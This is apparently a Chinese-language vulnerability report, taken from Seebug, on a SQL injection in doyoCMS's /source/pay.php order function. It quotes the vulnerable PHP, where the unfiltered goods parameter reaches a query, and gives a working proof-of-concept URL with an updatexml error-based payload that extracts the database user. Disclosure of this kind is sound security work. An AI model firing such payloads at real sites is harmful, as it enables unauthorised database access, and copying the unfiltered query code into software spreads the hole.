VULHUB ™

### 简要描述： doyoCMS注入漏洞1处 ### 详细说明： 注入漏洞一枚： 存在注入的代码位置/source/pay.php 具体代码： function order(){ if($this->syArgs('oid')||$this->syArgs('orderid',1)!=''){ if($this->syArgs('oid')){$r=array('id'=>$this->syArgs('oid',1));}else{$r=array('orderid'=>$this->syArgs('orderid',1));} $order=$this->c->find($r); if($order['state']!=0){jump('?c=member&a=myorder&oid='.$order['id']);} $this->goods=$this->goods_db(unserialize($order['goods']),$order['logistics']); }else{ if($GLOBALS['G_DY']['vercode']==1){ if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误"); } $this->cart=$this->syArgs('cart'); $virtual=$this->syArgs('virtual'); if(!$this->id&&!$this->cart)message("请指定购买内容"); $info=$this->syArgs('info',2); if($virtual!=1&&($info['name']==''||$info['phone']==''||$info['address1']==''||$info['address2']==''||$info['address']==''))message("姓名、手机、省、市、地址为必填"); if($this->cart){ syDB('goodscart')->delete(array('uid'=>$this->my['id'])); }...

### 简要描述： doyoCMS注入漏洞1处 ### 详细说明： 注入漏洞一枚： 存在注入的代码位置/source/pay.php 具体代码： function order(){ if($this->syArgs('oid')||$this->syArgs('orderid',1)!=''){ if($this->syArgs('oid')){$r=array('id'=>$this->syArgs('oid',1));}else{$r=array('orderid'=>$this->syArgs('orderid',1));} $order=$this->c->find($r); if($order['state']!=0){jump('?c=member&a=myorder&oid='.$order['id']);} $this->goods=$this->goods_db(unserialize($order['goods']),$order['logistics']); }else{ if($GLOBALS['G_DY']['vercode']==1){ if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误"); } $this->cart=$this->syArgs('cart'); $virtual=$this->syArgs('virtual'); if(!$this->id&&!$this->cart)message("请指定购买内容"); $info=$this->syArgs('info',2); if($virtual!=1&&($info['name']==''||$info['phone']==''||$info['address1']==''||$info['address2']==''||$info['address']==''))message("姓名、手机、省、市、地址为必填"); if($this->cart){ syDB('goodscart')->delete(array('uid'=>$this->my['id'])); } $this->goods=$this->syArgs('goods',2); if($virtual!=1){ $o=$this->order_add($this->goods,0,$this->syArgs('logistics',1),$info,$this->syArgs('unote',1)); jump($GLOBALS['WWW'].'index.php?c=pay&a=order&oid='.$o); }else{ $payment=$this->syArgs('payment',1); if(!$payment)message("请指定支付平台"); $vi=total_page($this->db.'product_virtual where aid='.$this->goods[0]['aid'].' and state=0'); if($vi<$this->goods[0]['quantity'])message("库存不足，暂无法购买，请联系客服。",'?c=pay&id='.$this->goods[0]['aid']); $o=$this->order_add($this->goods,1,$this->syArgs('logistics',1),$info,$this->syArgs('unote',1)); jump($GLOBALS['WWW'].'index.php?c=pay&a=pay&payment='.$payment.'&id='.$o); } } [<img src="https://images.seebug.org/upload/201503/08114103f24d6a482ea6140dfb54e3eddecd8c28.png" alt="222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/08114103f24d6a482ea6140dfb54e3eddecd8c28.png) 第120行为漏洞触发的地方，goods由url传过来的，但是因为syArgs(,2)不做过滤处理，所以导致注入发生 验证： 注册用户登录之 访问http://localhost/doyo/index.php?c=pay&a=order&id=1&cart=1&virtual=1&info['name']=1&info['phone']=1&info['address1']=1&info['address2']=1&info['address']=1&payment=1&goods[0][aid]=1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) [<img src="https://images.seebug.org/upload/201503/08114129b7eb68eb43d5afb3fa3359921e8d46d1.png" alt="333.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/08114129b7eb68eb43d5afb3fa3359921e8d46d1.png) 没有问题了 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/08114129b7eb68eb43d5afb3fa3359921e8d46d1.png" alt="333.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/08114129b7eb68eb43d5afb3fa3359921e8d46d1.png)